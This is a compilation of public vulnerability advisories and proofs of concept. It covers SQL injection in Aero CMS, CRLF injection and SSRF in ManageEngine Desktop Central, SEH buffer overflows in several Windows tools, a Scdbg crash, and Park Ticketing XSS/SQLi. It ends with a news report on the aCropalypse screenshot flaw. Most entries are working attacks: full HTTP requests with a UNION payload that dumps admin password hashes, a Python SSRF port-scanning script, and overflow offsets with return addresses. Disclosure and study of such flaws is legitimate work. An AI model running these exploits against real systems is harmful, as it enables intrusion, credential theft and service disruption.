Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

    # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://github.com/MegaTKC/AeroCMS# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 0.0.1# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example SQL Injection-----------------------------------------------------------------------------------------------------------------------Param: search-----------------------------------------------------------------------------------------------------------------------Req sql ini detect-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692'&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:06 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 3466Connection: closeContent-Type: text/html; charset=UTF-8[...]Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 21search=245692''&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 03:07:10 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 94216[...]-----------------------------------------------------------------------------------------------------------------------Req exploiting sql ini get data admin-----------------------------------------------------------------------------------------------------------------------POST /AeroCMS-master/search.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57Origin: http://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: http://127.0.0.1/AeroCMS-master/Content-Type: application/x-www-form-urlencodedAccept-Language: en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 113search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 05:40:05 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40X-Powered-By: PHP/5.6.40Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 101144[...]                    <a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>[...]-----------------------------------------------------------------------------------------------------------------------Other URL and params-----------------------------------------------------------------------------------------------------------------------/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [filename]/AeroCMS-master/admin/profile.php [filename]/AeroCMS-master/author_posts.php [author]/AeroCMS-master/category.php [category]/AeroCMS-master/post.php [p_id]/AeroCMS-master/search.php [search]/AeroCMS-master/admin/categories.php [cat_title]/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]/AeroCMS-master/admin/posts.php [post_content]/AeroCMS-master/admin/posts.php [p_id]/AeroCMS-master/admin/posts.php [post_category_id]/AeroCMS-master/admin/posts.php [post_title]/AeroCMS-master/admin/posts.php [reset]

Aero CMS 0.0.1 SQL Injection

Desktop Central version 9.1.0 suffers from crlf injection, and server-side request forgery vulnerabilities.

    # Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-02-14# Software Link : http://www.desktopcentral.com# Tested Version: 9.1.0 (Build No: 91084)# Tested on:  Windows 10# Vulnerability Type: CRLF injection (CRLF) - 1CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.csv.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostResponse:HTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csvX-dc-header: yesContent-Length: 95Keep-Alive: timeout=5, max=20Connection: Keep-AliveContent-Type: text/csv;charset=UTF-8# Vulnerability Type: CRLF injection (CRLF) - 2CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostHTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013X-dc-header: yesContent-Length: 4470Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/pdf;charset=UTF-8# Vulnerability Type: Server-Side Request Forgery (SSRF)CVSS v3: 8.0CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:HCWE: CWE-918 Server-Side Request Forgery (SSRF)Vulnerability description: Server-Side Request Forgery (SSRF) vulnerabilityin ManageEngine Desktop Central 9.1.0 allows an attacker can force avulnerable server to trigger malicious requests to third-party servers orto internal resources. This vulnerability allows authenticated attackerwith network access via HTTP and can then be leveraged to launch specificattacks such as a cross-site port attack, service enumeration, and variousother attacks.Proof of concept:Save this content in a python file (ex. ssrf_manageenginedesktop9.py),change the variable sitevuln value with ip address:import argparsefrom termcolor import coloredimport requestsimport urllib3import datetimeurllib3.disable_warnings()print(colored('''------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------''',"red"))def smtpConfig_ssrf(target,port,d):    now1 = datetime.datetime.now()    text = ''    sitevuln = 'localhost'    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;JSESSIONID=D10A9C62D985A0966647099E14C622F8;DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'    try:        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie':        cookie,'Connection': 'keep-alive'},verify=False, timeout=10)        text = response.text        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if ('updateRefMsgCookie' in text):            return colored('Cookie lost',"yellow")        if d == "0":            print ('Time response: ' + str(rest) + '\n' + text + '\n')        if (seconds > 5.0):            return colored('open',"green")        else:            return colored('closed',"red")    except:        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if (seconds > 10.0):            return colored('open',"green")        else:            return colored('closed',"red")    return colored('unknown',"yellow")if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -SSRF Open ports",required=True)    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9- SSRF Open ports",required=True)    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central9 - SSRF Open ports (0 print or 1 no print)",required=False)    args = parser.parse_args()    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')And:$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:8080 open$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:7777 closed

Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery

Explorer32++ version 1.3.5.531 suffers from a buffer overflow vulnerability.

    # Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://www.explorerplusplus.com/# Software Link : http://www.explorerplusplus.com/# Tested Version: 1.3.5.531# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Explorer++ 1.3.5.531, and possibly other versions, may allow attackersto execute arbitrary code via a long file name argument.Proof of concept:Open Explorer32++.exe from command line with a large string in Arguments,more than 396 chars:File '<Explorer++_PATH>\Explorer32++.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FB14   0069004100370069   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fb14 overwritten withunicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclicdata after the handler

Explorer32++ 1.3.5.531 Buffer Overflow

Frhed version 1.6.0 suffers from a buffer overflow vulnerability.

    # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://frhed.sourceforge.net/# Software Link : http://frhed.sourceforge.net/# Tested Version: 1.6.0# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Frhed (Free hex editor) v1.6.0, and possibly other versions, may allowattackers to execute arbitrary code via a long file name argument.Proof of concept:Open Frhed.exe from command line with a large string in Arguments, morethan 494 chars:File '<Frhed_PATH>\Frhed.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FC8C   4136714135714134   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fc8c overwritten withnormal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclicdata after the handler0BADF00D   ------------------------------                       'Targets'        =>                           [                               [ '<fill in the OS/app version here>',                                   {                                       'Ret'         =>    0x00401ba7, #pop ecx # pop ecx # ret    - Frhed.exe (change this value by other without\x00)                                       'Offset'    =>    494                                   }                               ],                           ],

Frhed 1.6.0 Buffer Overflow

Resource Hacker version 3.6.0.92 suffers from a buffer overflow vulnerability.

    # Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.angusj.com/resourcehacker/# Software Link : http://www.angusj.com/resourcehacker/# Tested Version: 3.6.0.92# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Heap-based buffer overflow controlling the Structured Exception Handler(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,may allow attackers to execute arbitrary code via a long file name argument.Proof of concept:Open ResHacker.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\ResourceHacker36\ResHacker.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'SEH chain of main threadAddress    SE handler0018FCB4   316A41306A413969   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fcb4 overwritten withnormal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclicdata after the handler0BADF00D   ------------------------------'Targets'        =>[[ '<fill in the OS/app version here>',{                                       'Ret'         =>    0x00426446, #pop eax # pop ebx # ret    - ResHacker.exe (change this value from Mona,with a not \x00 ret address)                                       'Offset'    =>    268}],],

Resource Hacker 3.6.0.92 Buffer Overflow

Hex Workshop version 6.7 is vulnerable to denial of service via command line file arguments and control of the Structured Exception Handler (SEH) records.

    # Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com# Tested Version: v6.7# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Hex Workshop v6.7 is vulnerable to denial of service via a command linefile arguments and control the Structured Exception Handler (SEH) records.Proof of concept:Open HWorks32.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\Hex Workshop\HWorks32.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0089e63c overwritten withunicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclicdata after the handlerThe application crash.

Hex Workshop 6.7 Buffer Overflow / Denial Of Service

Scdbg version 1.0 suffers from a buffer overflow vulnerability that can cause a denial of service condition.

    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2021-06-13# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152# Software Link : https://github.com/dzzie/VS_LIBEMU# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45# Tested on:  Windows 7, 10CVSS v3: 7.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HCWE: CWE-400Vulnerability description: scdbg.exe (all versions) is affected by a Denialof Service vulnerability that occurs when you use the /foff parameter ornot with a specific shellcode causing it to shutdown. Any malware could usethis option to evade the scan.Proof of concept:Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -fscdbg_crash.bin / scdbg.exe -f scdbg_crash.bin#!/usr/bin/env pythoncrash = "\x90\xF6\x84\x01\x90\x90\x90\x90"f = open ("scdbg_crash.bin", "w")f.write(crash)f.close()You can use gui_launcher.exe and check "Start offset 0x": 1 or directlywithout check[image: image.png]

Scdbg 1.0 Denial Of Service

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the Admin Name parameter.

_\# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — Stored XSS Vulnreability.  
\# Date: 25–01–2023  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:_ _https://phpgurukul.com/__\# Software Link:_ _https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/__\# Vulnerable Parameter : Admin Name  
\# Version: 1.0  
\# Tested on: Windows 10  
\# Contact:_ _https://www.linkedin.com/in/shivakumar-m-v/_

XSS is an attack technique that injects malicious code into vulnerable web applications. Unlike other attacks, this technique does not target the web server itself, but the user’s browser.

Stored XSS is a type of XSS that stores malicious code on the application server. Using stored XSS is only possible if your application is designed to store user input.

The Reproducive Steps are given in Video PoC.

Remediation :

01) Use Web Application Firewall.

02) Input validation.

CVE-2023-26958: Stored XSS — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Phpgurukul Park Ticketing Management System 1.0 is vulnerable to SQL Injection via the User Name parameter.

> \# Exploit Title: PARK TICKETING MANAGEMENT SYSTEM — SQL Injection Vulnreability.  
> \# Date: 25–01–2023  
> \# Exploit Author: Venkata Siva Kumar Medituru  
> \# Vendor Homepage: https://phpgurukul.com/  
> \# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/  
> \# Vulnerable Parameter : User Name  
> \# Version: 1.0  
> \# Tested on: Windows 10  
> \# Contact: https://www.linkedin.com/in/shivakumar-m-v/

SQL injection is a technique used to exploit the Authentication pages and intruder can penetrate into dashboard without any valid credentials. The perpetrator may enumerate User name, personal information, App functionality and in other words complete account take over is possible.

The reproducive steps are given in vidoe PoC.

> **Mitigations**

01) Configure Web Application Firewall to understand various SQL payloads and to ignore / drop the malicious requests crafted by perpetrator

02) Implement input validations and parametrized queries including prepared statements.

03) Limit the verbose error messages in the responses so that attacker not able to figure out the way to bypass the implemented controls.

CVE-2023-26959: Authentication Bypass — PARK TICKETING MANAGEMENT SYSTEM(Phpgurukul)

Microsoft has released an out-of-band update to address a privacy-defeating flaw in its screenshot editing tool for Windows 10 and Windows 11.
The issue, dubbed aCropalypse, could enable malicious actors to recover edited portions of screenshots, potentially revealing sensitive information that may have been cropped out.
Tracked as CVE-2023-28303, the vulnerability is rated 3.3 on the CVSS

Privacy / Windows Security

Microsoft has released an out-of-band update to address a privacy-defeating flaw in its screenshot editing tool for Windows 10 and Windows 11.

The issue, dubbed **aCropalypse**, could enable malicious actors to recover edited portions of screenshots, potentially revealing sensitive information that may have been cropped out.

Tracked as **CVE-2023-28303**, the vulnerability is rated 3.3 on the CVSS scoring system. It affects both the Snip & Sketch app on Windows 10 and the Snipping Tool on Windows 11.

"The severity of this vulnerability is Low because successful exploitation requires uncommon user interaction and several factors outside of an attacker's control," Microsoft said in an advisory released on March 24, 2023.

Successful exploitation requires that the following two prerequisites are met -

*   The user must take a screenshot, save it to a file, modify the file (for example, crop it), and then save the modified file to the same location.
*   The user must open an image in Snipping Tool, modify the file (for example, crop it), and then save the modified file to the same location.

However, it does not impact scenarios where an image is copied from the Snipping Tool or modified before saving it.

"If you take a screenshot of your bank statement, save it to your desktop, and crop out your account number before saving it to the same location, the cropped image could still contain your account number in a hidden format that could be recovered by someone who has access to the complete image file," Microsoft explains.

"However, if you copy the cropped image from Snipping Tool and paste it into an email or a document, the hidden data will not be copied, and your account number will be safe."

The vulnerability has been addressed in-app version 10.2008.3001.0 of Snip and Sketch installed on Windows 10 and version 11.2302.20.0 of Snipping Tool installed on Windows 11.

aCropalypse first came to light on March 18, 2022, when it was found that a bug in Google Pixel's Markup tool made it possible to retroactively reverse the changes introduced to screenshots, thereby recovering personal information from redacted screenshots and images, including those that have been cropped or had their contents masked.

Credited with discovering the problem are reverse engineers Simon Aarons and David Buchanan.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The Pixel-related high-severity flaw, tracked as CVE-2023-21036, was reported to Google on January 2, 2023, and was fixed via an update released on March 6, 2023 for Pixel 4A, 5A, 7, and 7 Pro devices.

The shortcoming has existed since the release of the Markup utility with Android 9 Pie in 2018, and images already shared over the past five years are vulnerable to the Acropalypse attack, raising possible privacy concerns.

"You can patch it, but you can't easily un-share all the vulnerable images you may have sent," Buchanan said in a tweet, describing it as a "bad one."

A similar issue with reversible cropping was recently disclosed in Google Docs as well, allowing users with view-only access to recover original versions of cropped images in shared documents without having the edit permissions to do so.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows